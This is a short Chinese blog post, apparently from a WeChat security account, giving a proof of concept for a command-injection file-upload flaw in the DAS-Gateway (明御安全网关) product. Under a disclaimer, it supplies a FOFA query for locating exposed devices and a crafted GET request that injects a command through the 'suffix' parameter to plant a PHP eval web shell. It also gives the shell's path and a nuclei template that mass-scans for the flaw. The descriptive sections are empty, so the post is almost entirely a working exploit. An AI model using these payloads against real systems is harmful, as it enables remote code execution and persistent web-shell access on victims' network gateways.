安恒明御安全网关文件上传
一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
三、资产梳理:
title=“明御安全网关”
四、漏洞复现:
五、POC:
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
木马地址: http://xxx/webui/.xxx.php
nuclei:
id: mingyu_upload
info:
name: mingyu_upload
author: joyboy
severity: critical
description: http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php
metadata:
max-request: 1
fofa-query: title="明御安全网关"
verified: true
CVE:
tags: 明御安全网关,uploadfile
requests:
- raw:
- |
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'success'